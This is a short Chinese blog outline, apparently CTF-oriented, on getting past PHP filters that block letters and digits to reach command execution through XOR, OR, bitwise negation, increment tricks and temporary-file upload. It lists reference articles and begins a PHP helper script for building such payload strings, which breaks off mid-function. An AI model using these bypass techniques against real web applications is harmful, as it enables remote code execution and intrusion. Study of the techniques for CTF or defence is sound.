无字母数字绕过正则表达式--上传临时文件、异或、或、取反、自增

本文链接：https://blog.csdn.net/unexpectedthing/article/details/120230159

文章目录

异或（^）达到命令执行

要求的符号: ^

取反(~)达到命令执行

要求的符号：~

或（|）达到命令执行

要求的符号：|

自增自减(++,–)达到命令执行

要求的符号："$", “.”, “_”, “=”,"+" 和一些其他的符号。

上传临时文件

解决了对长度限定的问题，和在php5，没有数字字母和$来执行命令

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

参考文献

前三个的脚本：参考羽神的文章

https://blog.csdn.net/miuzzx/article/details/108569080?spm=1001.2014.3001.5501

P神的文章：

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html（一些原理）

y4的脚本

<?php
/*
# -*- coding: utf-8 -*-
# @Author: Y4tacker
# @Date:   2020-11-21 20:31:22
*/
//或
function orRce($par1, $par2){
   
    $result = (urldecode($par1)|urldecode($par2));
    return $result;
}

//异或
function xorRce($par1, $par2){
   
    $result = (urldecode($par1)^urldecode($par2));
    return $result;
}

//取反
function negateRce(){
   
    fwrite(STDOUT,'[&#